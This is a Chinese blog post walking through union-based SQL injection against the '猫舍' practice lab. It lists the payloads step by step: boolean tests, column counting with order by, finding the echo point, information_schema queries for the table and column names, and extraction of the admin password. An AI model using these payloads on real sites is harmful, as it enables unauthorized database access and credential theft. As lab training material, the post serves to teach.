SQL注入之猫舍
2024-10-21 06:00:44
第一步:先查看是否存在注入点:构造?id=1 and 1=1
回车后发现页面正常
构造?id=1 and 1=2
发现页面异常,得出结论:存在注入点
第二步:判断字段数
当输入order by 1和order by 2时页面都显示正常
当输入order by 3时,页面发生了异常
说明字段数为2
第三步:判断回显点
构造?id=1 and 1=2 union select 1,2 发现下面显示的是数字 “2” 说明在返显点在数字2的位置
第四步:查询相关内容
查询数据库名:and 1=2 union select 1,database() ,得到结果为mashe
查询表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
得到结果:admin
查询字段名:(在admin表中查询)and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
第一个字段名为 id
第二个字段为username
第三个字段名为password
继续查询字段内容
查询用户名
这里查询第二排 limit 1,1发现没有正经用户,所以只有admin一个用户
查询admin用户的密码: and 1=2 union select 1,password from admin
得到最终结果 hellohack
最新文章
- 聊聊ASP.NET Core默认提供的这个跨平台的服务器——KestrelServer
- Oracle Database 11g Express Editon介绍及安装
- CSS white-space 属性
- Sql 获取向上取整、向下取整、四舍五入取整的实例
- 关于session和token
- STM32 DMA USART ADC
- Python数据类型(3)
- LDR 和 ADR 彻底详解
- css动画之波纹
- linux在安装jdk时报错
- USACO CHAPTER 1 1.1 Ride 水题
- android117 下拉列表
- Windows 7 Shortcuts (完整兼具分类有序,想我所想,赞!)
- Codeforces Round #315 (Div. 2)
- 百度前端面试题-类似slack的在线聊天室
- Linux架构浅谈
- TCP传输
- 2018-12-03 VS Code英汉词典插件v0.0.7-尝试词性搭配
- unbuntu 安装python包提示E: Unable to locate package python-timeout
- 【转】Flash:同志们,这些知识点你们知道多少?(一些必备的Flash开发知识点)
热门文章
- Typescript, ES6
- struts2 中 form-action action-form 的传参方式
- tornado中通用模版
- eval(input())
- PolarDB PostgreSQL logindex 设计
- CF932G-Palindrome Partition【PAM】
- ❤️Python接口自动化,一文告诉你连接各大【数据库】建议收藏❤️
- 从产业链、架构和技术三个层面,看元宇宙与RPA的发展关系
- 记typora美化----让文章更加优美
- mysql面试题及答案,mysql最新面试题,mysql面试题大全汇总